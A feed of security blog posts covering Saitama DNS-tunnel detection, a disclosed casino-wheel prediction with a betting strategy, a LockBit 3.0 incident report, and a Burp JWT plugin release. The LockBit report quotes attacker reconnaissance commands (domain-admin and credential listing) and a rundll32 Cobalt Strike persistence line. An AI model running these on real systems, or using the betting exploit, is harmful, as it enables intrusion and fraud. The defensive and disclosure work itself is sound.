Unfortunately, the detection of randomness in DNS queries is by itself not a solid enough indicator to detect DNS tunnels without yielding large numbers of false positives. However, a second limitation of DNS tunnelling is that a DNS query can only carry a limited number of bytes. To be an effective C2 channel an attacker needs to be able to send multiple commands and receive corresponding output, resulting in (slow) bursts of multiple queries.  

This is where the second step for behaviour-based detection comes in: plainly counting the number of unique queries that have been classified as ‘randomized’. The specifics of these bursts differ slightly between tools, but in general, there is no or little idle time between two queries. Saitama is an exception in this case. It uses a uniformly distributed sleep between 40 and 80 seconds between two queries, meaning that on average there is a one-minute delay. This expected sleep of 60 seconds is an intuitive start to determine the threshold. If we aggregate over an hour, we expect 60 queries distributed over 3 domains. However, this is the mean value and in 50% of the cases there are less than 60 queries in an hour.  

To be sure we detect this, regardless of random sleeps, we can use the fact that the sum of uniform random observations approximates a normal distribution. With this distribution we can calculate the number of queries that result in an acceptable probability. Looking at the distribution, that would be 53. We use 50 in our signature and other rules to incorporate possible packet loss and other unexpected factors. Note that this number varies between tools and is therefore not a set-in-stone threshold. Different thresholds for different tools may be used to balance False Positives and False Negatives. 

In summary, combining detection for random-appearing DNS queries with a minimum threshold of random-like DNS queries per hour, can be a useful approach for the detection of DNS tunnelling. We found in our testing that there can still be some false positives, for example caused by antivirus solutions. Therefore, a last step is creating a small allow list for domains that have been verified to be benign. 

While more sophisticated detection methods may be available, we believe this method is still powerful (at least powerful enough to catch this malware) and more importantly, easy to use on different platforms such as Network Sensors or SIEMs and on diverse types of logs. 

Conclusion

When new malware arises, it is paramount to verify existing detection efforts to ensure they properly trigger on the newly encountered threat. While Indicators of Compromise can be used to retroactively hunt for possible infections, we prefer the detection of threats in (near-)real-time. This blog has outlined how we developed a server-side implementation of the implant to create a proper recording of the implant’s behaviour. This can subsequently be used for detection engineering purposes. 

Strong randomization, such as observed in the Saitama implant, significantly hinders signature-based detection. We detect the threat by detecting its evasive method, in this case randomization. Legitimate DNS traffic rarely consists of random-appearing subdomains, and to see this occurring in large bursts to previously unseen domains is even more unlikely to be benign.  

Resources

With the sharing of the server-side implementation and recordings of Saitama traffic, we hope that others can test their defensive solutions.  

The server-side implementation of Saitama can be found on the Fox-IT GitHub.  

This repository also contains an example PCAP & Zeek logs of traffic generated by the Saitama implant. The repository also features a replay script that can be used to parse executed commands & command output out of a PCAP. 

References

[1] https://blog.malwarebytes.com/threat-intelligence/2022/05/apt34-targets-jordan-government-using-new-saitama-backdoor/ 
[2] https://blog.malwarebytes.com/threat-intelligence/2022/05/how-the-saitama-backdoor-uses-dns-tunnelling/ 
[3] https://x-junior.github.io/malware%20analysis/2022/06/24/Apt34.html
[4] https://blog.fox-it.com/2019/06/11/using-anomaly-detection-to-find-malicious-domains/   

Wheel of Fortune Outcome Prediction – Taking the Luck out of Gambling

16 August 2022 at 19:50

Authored by: Jesús Miguel Calderón Marín

Introduction

Two years ago I carried out research into online casino games specifically focusing on roulette. As a result, I composed a detailed guide with information on classification of online roulette, potential vulnerabilities and the ways to detect them[1].

Although this guideline was particularly well-received by the security community, I felt that it was too theoretical and lacked a real-world example of a vulnerable casino game.
With this, I decided to carry out research on a real casino game in search of new vulnerabilities and exploit techniques. In case of success, I planned to share the results with the affected vendor[2] and afterwards with the community.

While I was looking for a target I had a look on a particular variant of the casino game ‘Wheel of fortune’. The wheel is spun manually by a croupier and not by any automated system. That caught my eye and made me think about the randomness of the winning numbers. Typically, pseudo random number generators (PRNGs) are one of the main targets when it comes to game security assessments. However, there is no a PRNG in this case. Apparently, the randomness relies on the number of times the croupier spins the wheel, which, in turn, depends on their arm strength among other properties. The question that immediately came to my mind was whether a croupier is a good ‘PRNG’?

Summary

IMPORTANT NOTE. For security reasons and in order to keep confidential the identity of the vendor and game affected, some data has been redacted or omitted and the name of the game was changed to a generic one (Big Six). In addition, screenshots of the real wheel and croupiers have been substituted by similar images specially created for this purpose.

Bix Six is a casino game based on Wheel of Fortune game. Briefly, it is a big vertical wheel where the player bets on the number it will stop on [3].

According to this security analysis, the outcome of the Big Six game is predictable enough in order that the house edge could be overcome and consequently a profit could be made in the long run. Generally speaking, croupiers unconsciously tend to spin the wheel a specific number of times hence the dispersion of the number of spins is too small. Consequently, some positions of the wheel had higher chances of winning and a player could benefit by betting on these positions.

Table of Contents

The rules

The wheel is comprised of 54 segments. The possible outcomes on the wheel are 1, 2, 5, 10, 20, 40, multiplier 1 (M1) and multiplier 2 (M2).

Figure 1 – Bix Six Wheel

Players bet on a number they think the wheel will land on and then the croupier spins the wheel. The bets must be placed within the table limits, which are shown on the screen. The colour around the countdown indicates when players can place bets (green), when betting time is nearly over (amber) and when no further bets can be placed for the current round (no countdown).

Figure 2 – Phases of the betting round

It is worth mentioning that the croupier starts spinning the wheel before the betting time is over and continues doing it for several seconds once the betting time is over and the betting panel is no longer available.

Some spins after, the winning number is determined and pay-outs are made on winning bets.

Figure 3 – Winning segment indicated by the leather pointer at the top of the wheel

Odds and pay-outs

The wheel can stop on the numbers 1, 2, 5, 10, 20 and 40. The pay-out of each segment is a bet multiplied by its number plus the stake. For example, if a player bets 15 pounds on number 10 and this turns out to be the winning number, the player is paid 165 pounds (15 x 10 + 15).

The segments M1 and M2 are multiplier segments, which makes the game more interesting. If the wheel stops on any of them, new bets are not accepted, and the wheel is spun again. However, any wins on the next spin are multiplied by [*REDACTED*] or [*REDACTED*], according to the multiplier the wheel stops on in the original spin. If the wheel stops on two or more multipliers, the final win is increased by as many times as all the multipliers before indicate.

The table below shows the number of stops, pay-out and house edge for each possible outcome:

Table 1 – Odds and pay-outs

Wheel tracker

A script was developed to record the behaviour and the outcome of the Bix Six online game. The obtained data included inter alia, initial speeds of the wheel, croupiers and winning numbers.

7,278 hands were recorded in April 2021 and subsequently analysed. The figures below show some of those hands.

Figure 4 – Tracked hands

Among most relevant data for analysis, the following is included:

  • winningNumber – the winning number displayed on the wheel as an outcome of every hand (1, 2, 5, 10, 20, 40, M1, o M2).
Figure 5 – Winning Number ‘2’
  • AbsolutePosition – unique number to identify unambiguously every segment. E.g. the yellow segment has the absolute position 0. This does not vary from hand to hand unlike relative positions (see the definition below).
Figure 6 – Segments’ identifiers (absolute positions 0, 18, 30, 43)
  • winningAbsolutePosition – the absolute position of the segment of the winning number. The following picture shows the winning number 40, which has the absolute position 0.
Figure 7 – Winning Absolute Position ‘0’
  • direction – the direction in which the wheel is spun. The value assigned to it is whether ‘CLOCKWISE’ or ‘ANTICLOCKWISE’.
  • positions_run – identical to the number of the wheel spins multiplied by 54 (the number of segments the wheel is divided into). For instance, if the wheel spins 1.5 times, the value of this variable will be 81 (1.5 * 54).
  • HAND_TIME (Initial position) – The moment in the video when the hand starts (e.g. 35.2 seconds from the beginning of the recording). This coincides with the instant before the betting panel is disabled and no longer available until the next game (specifically 0.5 seconds before). The position of the wheel at this moment will be referred to as the initial position from now on.
Figure 8 – Initial position – instant before the betting panel is disabled
Figure 9 – Instant when the betting panel is disabled
  • Relative positions – unique numbers to identify the segments of the wheel which are assigned at the initial position beginning from the segment on the top (position 1), followed by the next segment (position 2), etc. The next segment is on its left if the direction is clockwise or on its right if the direction is anticlockwise.
Figure 10 – Relative positions assigned at the initial position
  • winningRelativePosition – defines the relative position of the segment containing the winning number. It can be calculated using the following formula: round(positions_run % 54, 0) + 1. E.g. in the figures below, the blue segment that is in the relative position number 10 is the winning one. Therefore, the winning relative position is 10 for this hand.
Figure 11 – Initial position – Relative positions
Figure 12 – Final position – Winning relative position ‘10’

Wheel behaviour analysis

The values of the variables ‘winningAbsolutePosition’, ‘winningNumber’ and ‘winningRelativePosition’ have been analysed to establish the fact that they are random. In order to do this, the chi-square test of independence have been used to ascertain whether the difference between the analysed numbers distribution and the expected distribution is attributed to good luck or, on the contrary, to the lack of randomness, which could be eventually exploited by a malicious player. Should any further information about the method be required, the reference added to this document could be consulted [1][2].

Variables winningNumber and winningAbsolutePosition

The variables ‘winningNumber’ and ‘winningAbsolutePosition’ have successfully passed the test. Particularly, in case of ‘winningNumber’ the chi-squared statistic was 4.48. The critical value for the distribution chi-square with 7 degrees of freedom and the level of significance of 1% is 18.47[3]. As the critical value is significantly higher than chi-squared statistic (4.48), it is impossible to state that winning numbers are not random.

Similarly, the statistics for ‘winningAbsolutePosition’ was 32.18, which is much less than the critical value 79.84 (53 degrees of freedom and a level of significance of 1%). This implies that it cannot be stated that there is difference in size of the segments or the wheel is biased.

Variable winningRelativePosition

However, as for the parameter ‘winningRelativePosition’, it is notable that some positions win more frequently than others do, which could make it possible for a player to overcome the house edge and benefit from it. According to the collected data, the chi-squared statistic is 90.75 and exceeds the critical value 79.84 (53 degrees of freedom and a level of significance of 1%). In addition, the p-value (probability of obtaining test results at least as extreme as the results actually observed) [4] is 0.095%. These results suggest that the parameter ‘winningRelativePosition’ is far from being random.

Table 2 – Chi Squared – winningRelativePosition

The table below shows that p-value is even lower in winning relative positions for hands with clockwise direction, particularly 0.00000014%.

Table 3 – Chi Squared – winningRelativePosition – Clockwise

Simultaneous confidence intervals [5][6] were calculated for this last sample to ultimately know the maximum and minimum potential benefit which a player would be able to gain. In order to work this out, the Wilson score method was used with a confidence level of 90%.

It was estimated that a player has a probability of 2.15% of winning betting on the position 29 in the worst of cases. This probability considerably exceeds the expected value (1.851%) and implies a significant advantage for the player.

Table 4 -Confidence Intervals (Wilson method – 90% confidence) for winning relative positions – CLOCKWISE

Exploiting lack of randomness on winning relative positions

In order to exploit the lack of randomness of winning relative positions, betting strategies have to be designed. The following two sections include betting strategies designed for clockwise and anticlockwise games, and the analysis of their efficiency in comparison with other strategies.

Betting Strategies

A very simple winning betting strategy consists in betting on number 40 if the segment (there is only one segment with number 40) is in the relative position 29 and the wheel direction is clockwise. The following shows an example of how this strategy works. 

The image below shows the initial position of the wheel (this coincides with the instant before the betting panel is disabled and no longer available until the next game). Number 40 is in the relative position 8 but not in the relative position 29. Therefore, this game would be ignored, and no bets should be made.

Figure 13 – Initial position – Segment 40 is on the relative position 8

In the following initial position, number 40 is in the relative position 29. Therefore, a bet should be made on number 40.

Figure 14-  Initial position – Segment 40 is on the relative position 29

It is worth mentioning that the bets would need to be made in an automated way using a script because such tasks as identifying the number positioned in a specific relative position, and making (or not making) a bet within 0.5 seconds, are not possible to do manually.

According to the simultaneous confidence intervals calculated previously, the probability of winning would be between 2.15% and 3.01% (without taking into account the M2 and M1 segments), which considerably exceeds the expected value (1/54 = 0.0185 = 1.85%).

Taking into account the aforementioned probabilities and assuming that:

  • the wheel stops on the segments ‘M1’ and ‘M2’ with probabilities 1.9% and 1.4% in the worst of the cases, and 2.71% and 2.12% in the best of the cases.
  • all the segments have equal probability of winning if previously the wheel stopped on ‘M2’ or ‘M1’
  • the size of the bet is always 1€ and the winning quantity limit is 500.000€

it was estimated that the player could obtain a return on betting that would range from 0.56% to 41.80% using this strategy. For instance, a player would win a minimum of 5.6€ and a maximum of 418€ per every 1000€ bet, with approximately 90% of confidence.

Notably, this strategy might require long time to obtain a ‘worthy’ benefit as most of the games are discarded because bets are only placed when number 40 is in the relative position 29.

As a proof of concept, a more complex betting strategy was designed based on the estimated probabilities and expected ROI. It will be referred to as ‘MY BETTTING STRATEGY’ from now on.

Table 5 – My betting strategy

Depending on the direction (CLOCKWISE and ANTICLOCKWISE), the strategies are different.

The columns ‘BEST NUMBER TO BET ON’ contain the numbers which the player should bet on and the columns ‘RELATIVE POSITION OF NUMBER 40’ indicate the relative position of number 40.

For example, if the wheel is spinning clockwise and the relative position of the segment 40 is 7 (see the image below), the player should not bet on any number.

Figure 15 – Initial position – Segment 40 is on the relative position 7

However, if the wheel is spinning clockwise and the relative position of the segment 40 is 39, the player should bet on number 10 according to the strategy (see the following image and table).

Figure 16 – Initial position – Segment 40 is on the relative position 39
Table 6 – Excerpt from the ‘My betting strategy’ table

Analysing the effectiveness of betting strategies

A computer simulation of a fictitious player following ‘MY BETTING STRATEGY’ described in the previous section was run using the sample of 7.278 games (Figure 4 – Tracked hands).

For the simulation, it was assumed that:

  • all the segments have equal probability of winning if previously the wheel stopped on ‘M2’ or ‘M1’
  • as the winning numbers after the wheel stopping on ‘M2’ and ‘M1’ were not tracked by the script, the expected ROI was returned when the ‘winning segment’ was either ‘M2’ or ‘M1’. For instance, if following the strategy one euro is bet is on number 10 and the wheel stops on the segment ‘M2’, the total balance will be increased by [*REDACTED*] as this quantity is the expected ROI over the long run.
  • the size of the bet is always 1€ and the winning quantity limit is 500.000€

 The following table shows the results:

Table 7 – ROI of ‘My betting strategy’

Noticed that not all the games were played. E.g. for the ‘CLOCKWISE’ direction, 1,102 out of 3,646 games were played, which means that 2,544 were ignored, as they were not profitable according to the strategy.

The balance shows the winnings (positive in both cases) and the column ‘ROI’ indicates the average money per played hand, which the player made. In other words, ROI = 100 * ‘BALANCE’ / ‘GAMES PLAYED’.

In order to determine the effectiveness of the betting strategy, the probability of obtaining a return greater than or equal to the returns obtained was worked out. Specifically, a bootstrap[7] analysis was performed to estimate the distribution of returns for the following losing strategies:

  • RANDOM strategy consists in betting on any number (1, 2, 5, 10, 20 or 40) randomly.
  • ALWAYS 10 strategy consists in always betting on number 10. This is a very interesting strategy to compare with ‘MY BETTING STRATEGY’, as number 10 has the lowest house edge among all the numbers, [*REDACTED*]% (see Odds and pay-outs). Therefore, ‘ALWAYS 10’ strategy is supposed to be the best strategy as it allows minimising the losses per hand.

It is worth mentioning that Monte Carlo[8] analysis was performed as well, which yielded very similar results.

The following table shows the results of the analysis:

Table 8 – Results of the comparison between the strategies ‘RANDOM’, ‘ALWAYS 10’ and ‘MY BETTING STRATEGY’

As it can be observed, the probability of obtaining a return greater than or equal to ‘MY BETTING STRATEGY’ with the ‘random’ and ‘always 10’ betting strategies (across 1,102 and 303 games respectively) is less than 1%. This result suggests that the high effectiveness of ‘MY BETTING STRATEGY’ is far from being by luck.

The following graphs visually illustrate the effectiveness of ‘MY BETTING STRATEGY’ for the CLOCKWISE direction in comparison with the ‘random’ and ‘always 10’ betting strategies. A thousand games were simulated.

Figure 17 – MY BETTING STRATEGY vs ALWAYS 10 strategy
Figure 18 – MY BETTING STRATEGY strategy vs RANDOM strategy

It is noteworthy that better strategies could be worked out. However, they were not explored as exploiting the lack of randomness in an efficient way was not the aim of this analysis but highlighting the fact that the house edge could be overcome.

Other Considerations

It is worth mentioning that no intrusive tests were conducted during this research. Additionally, it was not necessary to make any bets to detect or proof the potential vulnerability described in this document. The interaction with the game was limited to record videos of the wheel, which were analysed afterwards.

Other online games were found to be similar to Bix Six. Therefore, these games might be vulnerable as well.

Recommendations

It is recommended to make the necessary changes to the game in order to generate random winning relative positions. This way, it will not be possible to overcome the house edge and make profit in the long run.

The best and safest solution (probably, the most expensive to implement as well) is to replace the croupiers by hardware that randomly generates the outcome and spins the wheel with the necessary and exact strength to show the previously determined number as the winning number.

Other solution might consist in increasing the difference between the minimum and maximum number of wheel spins. According to the observations, the croupiers currently spin the wheel approximately between 2.7 times (150 segments) and 4.7 times (258 segments). This means a difference of only two wheel spins (4.7 – 2.7 = 2). Additionally, it was observed that the croupiers unconsciously tend to spin the wheel a specific number of times. Particularly, a number between 3.56 and 3.62 times (192.5 – 195.5) as can be seen in the following histogram:

Picture 19 – Number of spins (expressed in number of segments)

Apparently, the fact that this distribution is bell-shaped is the reason why the winning positions are not random enough. Therefore, increasing the difference between the maximum and minimum number of wheel spins will help to flatten the curve and, consequently, to obtain more random winning numbers.

To illustrate this solution, a simulation of 7,200 wheel spins, whose numbers of segments run ranged from 147.5 to 511 (4 wheel spins difference instead of 2), was conducted. Its histogram can be seen in the image below:

Picture 20 – Number of spins (expressed in number of segments)

A chi-square test was conducted, and the p-value obtained was 98.6%. This result conforms well with a fair game and the deviation from expectations is well with the normal range.

Table 9 – Chi Squared – Winning numbers

Alternatively, winnings of players could be monitored and analysed statistically in real time. If a player’s winnings were unlikely to be by chance at a particular time, their accounts could be blocked temporarily and further investigation could be undertaken. Additionally, suspicious betting patterns could be monitored as well. For example, a player betting only on specific numbers (40 and 20) sporadically could be an indicative of a player trying to exploit this issue.

References

[1] Online Casino Roulette – A guideline for penetration testers and security researchers: https://research.nccgroup.com/2020/09/18/online-casino-roulette-a-guideline-for-penetration-testers-and-security-researchers/

[2] NCC Group Vulnerability Disclosure Policy: https://research.nccgroup.com/wp-content/uploads/2021/03/Disclosure-Policy.pdf

[3] Big Six – Wizard of odds: https://wizardofodds.com/games/big-six/

[4] Chi-squared distribution: https://en.wikipedia.org/wiki/Chi-squared_distribution

[5] Goodness of fit: https://en.wikipedia.org/wiki/Goodness_of_fit

[6] Chi Square Distribution Table for Degrees of Freedom 1-100: https://www.easycalculation.com/statistics/chisquare-table.php

[7] P-value – Wikipedia: https://en.wikipedia.org/wiki/P-value

[8] Confidence interval: https://en.wikipedia.org/wiki/Confidence_interval

[9] MultinomCI – Confidence Intervals for Multinomial Proportions: https://rdrr.io/cran/DescTools/man/MultinomCI.html

[10] Bootstrapping – https://en.wikipedia.org/wiki/Bootstrapping_(statistics)

[11] Monte Carlo – https://en.wikipedia.org/wiki/Monte_Carlo_method

Back in Black: Unlocking a LockBit 3.0 Ransomware Attack 

Authored by: Ross Inman (@rdi_x64)

Summary

tl;dr

This post explores some of the TTPs employed by a threat actor who were observed deploying LockBit 3.0 ransomware during an incident response engagement.

Below provides a summary of findings which are presented in this blog post:

  • Initial access via SocGholish.
  • Establishing persistence to run Cobalt Strike beacon.
  • Disabling of Windows Defender and Sophos.
  • Use of information gathering tools such as Bloodhound and Seatbelt.
  • Lateral movement leveraging RDP and Cobalt Strike.
  • Use of 7zip to collect data for exfiltration.
  • Cobalt Strike use for Command and Control. 
  • Exfiltration of data to Mega.
  • Use of PsExec to push out ransomware.

LockBit 3.0

LockBit 3.0 aka “LockBit Black”, noted in June of this year has coincided with a large increase of victims being published to the LockBit leak site, indicating that the past few months has heralded a period of intense activity for the LockBit collective.

In the wake of the apparent implosion of previous prolific ransomware group CONTI [1], it seems that the LockBit operators are looking to fill the void; presenting a continued risk of encryption and data exfiltration to organizations around the world.

TTPs

Initial Access

Initial access into the network was gained via a download of a malware-laced zip file containing SocGholish. Once executed, the download of a Cobalt Strike beacon was initiated which was created in the folder C:\ProgramData\VGAuthService with the filename VGAuthService.dll. Along with this, the Windows command-line utility rundll32.exe is copied to the folder and renamed to VGAuthService.exe and used to execute the Cobalt Strike DLL.

PowerShell commands were also executed by the SocGholish malware to gather system and domain information:

  • powershell /c nltest /dclist: ; nltest /domain_trusts ; cmdkey /list ; net group 'Domain Admins' /domain ; net group 'Enterprise Admins' /domain ; net localgroup Administrators /domain ; net localgroup Administrators ;
  • powershell /c Get-WmiObject win32_service -ComputerName localhost | Where-Object {$_.PathName -notmatch 'c:\\win'} | select Name, DisplayName, State, PathName | findstr 'Running' 

Persistence

A persistence mechanism was installed by SocGholish using the startup folder of the infected user to ensure execution at user logon. The shortcut file C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VGAuthService.lnk was created and configured to execute the following command which will run the Cobalt Strike beacon deployed to the host:

C:\ProgramData\VGAuthService\VGAuthService.exe C:\ProgramData\VGAuthService\VGAuthService.dll,DllRegisterServer

Defence Evasion

Deployment of a batch script named 123.bat was observed on multiple hosts and was deployed via PsExec. The script possessed the capabilities to uninstall Sophos, disable Windows Defender and terminate running services where the service name contained specific strings. The contents of the batch script are provided below:

Figure1: 123.bat contents

The ransomware binary used also clears key Windows event log files including Application, System and Security. It also prevents any further events from being written by targeting the EventLog service.

Discovery

Bloodhound was executed days after the initial SocGholish infection on the patient zero host. The output file was created in the C:\ProgramData\ directory and had the file extension .bac instead of the usual .zip, however this file was still a zip archive.  

A TGS ticket for a single account was observed on patient zero in a text file under C:\ProgramData\. It appears the threat actor was gathering TGS tickets for SPNs associated with the compromised user.

Seatbelt [2] was also executed on the patient zero host alongside Bloodhound. Security-orientated information about the host gathered by Seatbelt was outputted to the file C:\ProgramData\seat.txt.

Lateral Movement

The following methods were utilized to move laterally throughout the victim network:

  • Cobalt Strike remotely installed temporary services on targeted hosts which executed a Cobalt Strike beacon. An example command line of what the services were configured to run is provided below:

    rundll32.exe c:\programdata\svchost1.dll,DllRegisterServer
  • RDP sessions were established using a high privileged account the threat actor had compromised prior.

Collection

7zip was deployed by the adversary to compress and stage data from folders of interest which had been browsed during RDP sessions.

Command and Control

Cobalt Strike was the primary C2 framework utilized by the threat actor to maintain their presence on the estate as well as laterally move.

Exfiltration Using MegaSync

Before deploying the ransomware to the network, the threat actor began to exfiltrate data to Mega, a cloud storage provider. This was achieved by downloading Mega sync software onto compromised hosts, allowing for direct upload of data to Mega.

Impact

The ransomware was pushed out to the endpoints using PsExec and impacted both servers and end-user devices. The ransomware executable was named zzz.exe and was located in the following folders:

  • C:\Windows\
  • C:\ProgramData\
  • C:\Users\<user>\Desktop\

Recommendations

  1. Ensure that both online and offline backups are taken and test the backup plan regularly to identify any weak points that could be exploited by an adversary.
  2. Restrict internal RDP and SMB traffic so that only hosts that are required to communicate via these protocols are allowed to.   
  3. Monitor firewalls for anomalous spikes in data leaving the network.
  4. Block traffic to cloud storage services such as Mega which have no legitimate use in a corporate environment.
  5. Provide regular security awareness training.

If you have been impacted by LockBit, or currently have an incident and would like support, please contact our Cyber Incident Response Team on +44 161 209 5148 or email [email protected]

Indicators of Compromise

IOC Value Indicator Type Description
orangebronze[.]com Domain Cobalt Strike C2 server
194.26.29[.]13 IP Address Cobalt Strike C2 server
C:\ProgramData\svchost1.dll C:\ProgramData\conhost.dll C:\ProgramData\svchost.dll File Path Cobalt Strike beacons
C:\ProgramData\VGAuthService\VGAuthService.dll File Path Cobalt Strike beacon deployed by SocGholish
C:\Windows\zzz.exe C:\ProgramData\zzz.exe C:\Users\<user>\Desktop\zzz.exe File Path Ransomware Executable
c:\users\<user>\appdata\local\megasync\megasync.exe File Path Mega sync software
C:\ProgramData\PsExec.exe File Path PsExec
C:\ProgramData\123.bat File Path Batch script to tamper with security software and services
D826A846CB7D8DE539F47691FE2234F0FC6B4FA0 SHA1 Hash C:\ProgramData\123.bat
Figure 2: Indicators of Compromise

MITRE ATT&CK®

Tactic Technique ID Description
Initial Access Drive-by Compromise T1189 Initial access was gained via infection of SocGholish malware caused by a drive-by-download
Execution Command and Scripting Interpreter: Windows Command Shell T1059.003 A batch script was utilized to execute malicious commands
Execution Command and Scripting Interpreter: PowerShell T1059.001 PowerShell was utilized to execute malicious commands
Execution System Services: Service Execution T1569.002 Cobalt Strike remotely created services to execute its payload
Execution System Services: Service Execution T1569.002 PsExec creates a service to perform it’s execution
Persistence Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder T1547.001 SocGholish established persistence through a startup folder 
Defence Evasion Impair Defenses: Disable or Modify Tools T1562.001 123.bat disabled and uninstalled Anti-Virus software
Defence Evasion Indicator Removal on Host: Clear Windows Event Logs T1070.001 The ransomware executable cleared Windows event log files
Discovery Domain Trust Discovery T1482 The threat actor executed Bloodhound to map out the AD environment
Discovery Domain Trust Discovery T1482 A TGS ticket for a single account was observed in a text file created by the threat actor
Discovery System Information Discovery T1082 Seatbelt was ran to gather information on patient zero
Lateral Movement SMB/Admin Windows Shares T1021.002 Cobalt Strike targeted SMB shares for lateral movement
Lateral Movement Remote Services: Remote Desktop Protocol T1021.001 RDP was used to establish sessions to other hosts on the network
Collection Archive Collected Data: Archive via Utility T1560.001 7zip was utilized to create archives containing data from folders of interest
Command and Control Application Layer Protocol: Web Protocols T1071.001 Cobalt Strike communicated with its C2 over HTTPS
Exfiltration Exfiltration Over Web Service: Exfiltration to Cloud Storage T1567.002 The threat actor exfiltrated data to Mega cloud storage
Impact Data Encrypted for Impact T1486 Ransomware was deployed to the estate and impacted both servers and end-user devices
  1. https://www.bleepingcomputer.com/news/security/conti-ransomware-finally-shuts-down-data-leak-negotiation-sites/
  2. https://github.com/GhostPack/Seatbelt

Tool Release – JWT-Reauth

25 August 2022 at 16:20

[Editor’s note: This post is a part of our blog series from our NCC Group summer interns! You can see more posts from consultants in our internship program here.]

When testing APIs with short-lived authentication tokens, it can be frustrating to login every few minutes, taking up a consultant’s time with an unnecessary cut+paste task As well as introducing the possibility for human error in copying across the token, which can further hinder testing.

Today we are releasing JWT-Reauth, a plugin aims to provide a painless solution to this issue. JWT-Reauth provides Burp with a way to authenticate with a given endpoint, parse out the provided token and then attach it as a header on requests going to a given scope.

The latest version of the plugin can be downloaded as a JAR file from the releases page on GitHub: https://github.com/nccgroup/jwt-reauth/releases/

Feature List:

  • Caches authentication tokens
  • Regex parsing for the token format
  • Custom authentication header via the UI
  • Functionality accessible via the send-to-extension context menu:
    • Setting the authentication request
    • Parsing a token from a specific request
    • Adding a URL to the scope
  • Adjustable token refresh time
  • Entire plugin can be configured then enabled to start attaching the header

Example Usage:

This example will cover creating an authentication request in Postman, proxying it through Burp and adding that request to the plugin to be handled automatically.

Initially I like to setup my Burp proxy listening on 8081 as personal preference. I can then set Postman to proxy through Burp from the settings tab:

Once everything is going through Burp, we create an authentication request in Postman:

Once you have a working request for getting an access token, you can go to Burp’s target tab, find the site and use the context menu to send it to the plugin as an auth request. Note: requests from the proxy history also have this context menu.

While we’re in the target tab, it would be nice to add the request to JWT-Reauth’s own scope, so we do that using the “Send to JWT-Reauth (add to scope)” option in the context menu:

This will then appear in the JWT-Reauth’s own scope tab. I have also enabled the “Prefix” mode, meaning it will match any request whose URL has this as a prefix. This is useful for just including an entire site / subdirectory in the scope.

If we now navigate to the main plugin tab we will see the following:

JWT-Reauth has successfully used the authentication request to send a request of its own and parse the token out. To enable the substitution for proxied requests, we toggle the ‘not listening’ button to ‘listening’. If we now navigate to an in-scope URL we can see that the Authorization header is added:

Finally navigating back to the plugin we can see that it has cached the Authorization header for later use:

Alternative Uses

JWT-Reauth is also useful when using cURL, as it helps to avoid having to embed and update long token credentials in the commands.
The example cURL command below sends an authentication request through Burp using the –proxy option, enabling JWT-Reauth to reuse the request.

curl --request POST \
     --proxy 127.0.0.1:8081 \
     192.168.151.145:8080/auth_needs_post_data.php \
     --data "password=Password123"
{"access_token":"rVgzEQ9pAMU2vaDe5JBJtF3EhX9cVlhc0XGtUeElkGqSjsy7fC2XnHrS23vdULA41XlSY8McclN5dDXyO8Qh5yQv40RS3+2QDHrHVqqtT5mj4h261i\/WJQ89hn87V1im3AiubBsc4n8jTVa5qZq5tmXw9GXqaCx8jqkq21+UvqaGYInFrQA3sc8GLRfTVAHa+benVnZOGfqp\/ur6hOb79S4wTfoL8VoDT5OL+mkkIVxRebgEk6Cv+HkI5Uix7KgMA+MEH1IMfbdTPtVlHG1BOwuxrXmi1X00NRXXwwGfR6YCfwS9pXCLeegBj9M3dd+tEFyU4IROtk31Z48r4TfTpc3N70hcUKWvuzciNToIaTtN8qx78KSP9gGxgkzLHqlIjlHMSa6XZPrYkwN9"}

After JWT-Reauth has been configured, we can keep using cURL’s –proxy option instead of having to pass in the entire authentication header, and JWT-Reauth will handle the rest.

curl --request GET \
     --proxy 127.0.0.1:8081 \
     192.168.151.145:8080/
array (
  'Host' =>; '192.168.151.145:8080',
  'User-Agent' => 'curl/7.79.1',
  'Accept' => '*/*',
  'Connection' => 'close',
  'Authorization' => 'Bearer +7mXfg4WkDyu8ajEyZQCOPgDaH4N4UQgNF0puZzmEnwJI8pPKuJlL/AtWrUQqyPYXDKme4iFrFAq0woonGHrhcXh/cdeLK5G3GCmj6mj7pSn7dPJ+JqGugLouCgYAeLsN+E/88zPnPaIIls38tgUQ9sQxbFjb/nYcvRqFkJigQqwpXRcriGv1VKDT/fU8iCeoGbrlpJSl2hy7C+ReeZYQi1WMrBulCCzxyhGq0rVwQ1Ix1zxwt/wgN3DuXT7N6USiuZFMHWfzBvOj/Eo095zQ7sU4byMJB/YLFfxjzMOfaHmhHFWH4hoI9hOOEkJdXT/IUtRatWomya2F3ydWRd0vnNgrw1ZKh64ebWKxz+I2mUctXxmgQIE+gUqOnn5Y40azYt2V9P7g9rPeW89',
)

Summary

Overall I hope this plugin can be useful and save people some hassle. If you have any ideas for how to improve the plugin / features you would like to see, Issues and Pull Requests over on GitHub are very much appreciated!
https://github.com/nccgroup/jwt-reauth/issues

❌
❌